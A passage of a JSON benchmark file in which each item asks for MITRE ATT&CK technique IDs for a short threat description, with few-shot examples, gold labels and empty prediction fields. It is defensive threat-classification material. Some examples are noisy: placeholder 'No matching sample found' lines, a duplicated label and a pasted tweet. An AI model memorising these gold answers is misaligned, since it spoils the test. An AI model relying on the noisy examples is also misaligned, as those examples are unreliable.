Account Manipulation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1119: Automated Collection\n- Text: ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.\n\t - T1560: Archive Collected Data\n- Text: ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Earth Lusca has used WinRAR to compress stolen files into an archive prior to exfiltration.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet schedules a network job to execute two minutes after host infection.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: build_downer has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "Molerats has created scheduled tasks to persistently run VBScripts.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.\n\t - T1190: Exploit Public-Facing Application\n- Text: InvisiMole can register itself for execution and persistence via the Control Panel.\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n- Text: Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.\n\t - T1203: Exploitation for Client Execution\n", + "input": "UNC2452 exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.", + "gold": "- T1190: Exploit Public-Facing Application", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has made use of Python-based remote access tools.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: APT32 has used COM scriptlets to download Cobalt Strike beacons.\n\t - T1059: Command and Scripting Interpreter\n- Text: Penquin can execute remote commands using bash scripts.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "Bandook can support commands to execute Python-based payloads.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kazuar encodes communications to the C2 server in Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.\n\t - T1132: Data Encoding\n- Text: StrongPity can exfiltrate collected documents through C2 channels.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "OopsIE encodes data in hexadecimal format over the C2 channel.", + "gold": "- T1132.001: Data Encoding - Standard Encoding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Nltest may be used to enumerate trusted domains by using commands such as \"nltest /domain_trusts\".\n\t - T1482: Domain Trust Discovery\n- Text: All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers\n\t - T1069: Permission Groups Discovery\n\t - T1033: System Owner/User Discovery\n\t - T1016: System Network Configuration Discovery\n- Text: Comnie runs the \"net view\" command\n\t - T1018: Remote System Discovery\n", + "input": "APT29 used the \"Get-AcceptedDomain\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.", + "gold": "- T1482: Domain Trust Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerSploit has modules such as \"Get-NetDomainTrust\" and \"Get-NetForestTrust\" to enumerate domain and forest trusts.\n\t - T1482: Domain Trust Discovery\n- Text: The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine\u2019s user is in the admin or domain admin group\n\t - T1087.002: Account Discovery - Domain Account\n- Text: ROADTools can enumerate Azure AD groups.\n\t - T1069.003: Permission Groups Discovery - Cloud Groups\n", + "input": "FIN6 has used tools like Adfind to query users, groups, organizational units, and trusts.", + "gold": "- T1069.002: Permission Groups Discovery - Domain Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by APT1 as a name for malware.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "HTTPBrowser abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.", + "gold": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Xbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find NO functionality within Xbash that would enable restoration after the ransom is paid\n\t - T1485: Data Destruction\n- Text: HyperBro has the ability to delete a specified file.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data.\n\t - T1561.001: Disk Wipe - Disk Content Wipe\n", + "input": "Proxysvc can overwrite files indicated by the attacker before deleting them.", + "gold": "- T1485: Data Destruction", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LockBit 2.0 enumerates system information such as hostname, shares, and domain information.\n\t - T1082: System Information Discovery\n- Text: Dyre can detect sandbox analysis environments by inspecting the process list and Registry.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM \u00b7 Oct 30, 2019\u00b7Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick\n\t - T1480.001: Execution Guardrails - Environmental Keying\n", + "input": "InvisiMole can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To start, the implant looks for the AHNLAB V3 Antivirus software's class name \"49B46336-BA4D-4905-9824-D282F05F6576\". If the software is found, the implant will hide the AV software window from the view of the infected user\n\t - T1564.003: Hide Artifacts - Hidden Window\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.\n\t - T1010: Application Window Discovery\n- Text: Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.\n\t - T1055.011: Process Injection - Extra Window Memory Injection\n", + "input": "APT28 has used the WindowStyle parameter to conceal PowerShell windows.", + "gold": "- T1564.003: Hide Artifacts - Hidden Window", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RDAT has used HTTP if DNS C2 communications were not functioning.\n\t - T1008: Fallback Channels\n- Text: APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.\n\t - T1090.002: Proxy - External Proxy\n", + "input": "RainyDay can use proxy tools including boost_proxy_client for reverse proxy functionality.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.\n\t - T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting\n- Text: Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.\n\t - T1003.008: OS Credential Dumping - /etc/passwd and /etc/shadow\n\t - T1110.002: Brute Force - Password Cracking\n- Text: CopyKittens has used Metasploit, Empire, and AirVPN for post-exploitation activities.\n\t - T1588.002: Obtain Capabilities - Tool\n", + "input": "Impacket modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.", + "gold": "- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has exfiltrated data over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: VBShower has the ability to download VBS files to the target computer.\n\t - T1105: Ingress Tool Transfer\n- Text: Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.\n\t - T1001.001: Data Obfuscation - Junk Data\n", + "input": "Penquin can execute the command code \"do_upload\" to send files to C2.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks\n\t - T1016: System Network Configuration Discovery\n\t - T1119: Automated Collection\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1078: Valid Accounts\n- Text: This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as \u201c%MYPICTURES%\\%volume serial number%\u201c, from where it can be exfiltrated by the attackers using one of the AZZY implants\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1025: Data from Removable Media\n- Text: TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.\n\t - T1020: Automated Exfiltration\n", + "input": "Crutch can automatically monitor removable drives in a loop and copy interesting files.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.\n\t - T1082: System Information Discovery\n- Text: Small Sieve can obtain the id of a logged in user.\n\t - T1033: System Owner/User Discovery\n- Text: uses the ipconfig /all command to gather the victim\u2019s IP address.\n\t - T1016: System Network Configuration Discovery\n", + "input": "Honeybee gathers computer name and information using the \"systeminfo\" command.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LockBit 2.0 has been seen using the PowerShell module InvokeGPUpdate to update the group policy.\n\t - T1484.001: Domain or Tenant Policy Modification - Group Policy Modification\n\t - T1484.001: Domain or Tenant Policy Modification - Group Policy Modification\n- Text: has been known to remove indicators of compromise from tools.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: Bazar can use a timer to delay execution of core functionality.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "Egregor can modify the GPO to evade detection.", + "gold": "- T1484.001: Domain or Tenant Policy Modification - Group Policy Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POLONIUM has obtained and used tools such as AirVPN and plink in their operations.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.\n\t - T1003.003: OS Credential Dumping - NTDS\n", + "input": "Cleaver has obtained and used open-source tools such as PsExec, Windows Credential Editor, and Mimikatz.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has used developed tools in Python including Out1.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: No matching sample found for T1546.016\n", + "input": "Chaes has used Python scripts for execution and the installation of additional files.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ObliqueRAT can check for blocklisted process names on a compromised host.\n\t - T1057: Process Discovery\n- Text: Finally, Grandoreiro detects two virtual environments \u2013 VMWare via its special I/O port and Virtual PC via the vpcext instruction\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "FinFisher checks its parent process for indications that it is running in a sandbox setup.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A module in collects information from the victim about installed anti-virus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Turla surveys a system upon check-in to discover information in the Windows Registry with the \"reg query\" command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .\n\t - T1012: Query Registry\n- Text: Tropic Trooper's backdoor could list the infected system's installed software.\n\t - T1518: Software Discovery\n", + "input": "Mosquito's installer searches the Registry and system to see if specific antivirus tools are installed on the system.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Encrypting communications using AES and RSA public key cryptography 5\n\t - T1573: Encrypted Channel\n- Text: OilRig used the Plink utility and other tools to create tunnels to C2 servers.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: FatDuke can AES encrypt C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Chaes has used encryption for its C2 channel.", + "gold": "- T1573: Encrypted Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bundlore uses HTTP requests for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Bazar can send C2 communications with XOR encryption.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The bot shows a number of similarities to Dyre but appears to have been rewritten. This assumption is made based on old Dyre code, which would primarily use built-in functions for doing things such as AES and SHA256 hashing. In the recent samples identifying themselves as TrickBot, the code appears to be based on that old code but rewritten to use things such as Microsoft CryptoAPI and COM\n\t - T1571: Non-Standard Port\n", + "input": "The Carbanak malware communicates to its command server using HTTP with an encrypted payload.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SynAck parses the export tables of system DLLs to locate and call various Windows API functions.\n\t - T1106: Native API\n- Text: The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: SombRAT can execute \"loadfromfile\", \"loadfromstorage\", and \"loadfrommem\" to inject a DLL from disk, storage, or memory respectively.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", + "input": "After escalating privileges, MegaCortex calls \"TerminateProcess()\", \"CreateRemoteThread\", and other Win32 APIs.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access.\n\t - T1491.001: Defacement - Internal Defacement\n- Text: is capable of performing screen captures.\n\t - T1113: Screen Capture\n- Text: No matching sample found for T1612\n", + "input": "Meteor can change both the desktop wallpaper and the lock screen image to a custom image.", + "gold": "- T1491.001: Defacement - Internal Defacement", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The original variant of FakeM generates network beacons to its C2 server that begin with a 32-byte header that in most cases is meant to blend into network traffic generated by legitimate applications. Following this 32-byte header, the original variant of FakeM includes data encrypted using a custom encryption cipher that uses an XOR key of \u201cYHCRA\u201d and bit rotation between each XOR operation\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword \u201cInternet Widgits Pty Ltd\u201d is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n\t - T1185: Browser Session Hijacking\n- Text: FlawedAmmyy may obfuscate portions of the initial C2 handshake.\n\t - T1001: Data Obfuscation\n", + "input": "ZIRCONIUM has used AES encrypted communications in C2.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MCMD can Base64 encode output strings prior to sending to C2.\n\t - T1027: Obfuscated Files or Information\n- Text: Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: A string with the 5-character length and encoded with BASE64 is added to the beginning of the buffer encoded using the BASE64 algorithm\n\t - T1027: Obfuscated Files or Information\n\t - T1132: Data Encoding\n", + "input": "Final1stspy obfuscates strings with base64 encoding.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike uses a command-line interface to interact with systems.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n- Text: Cobalt 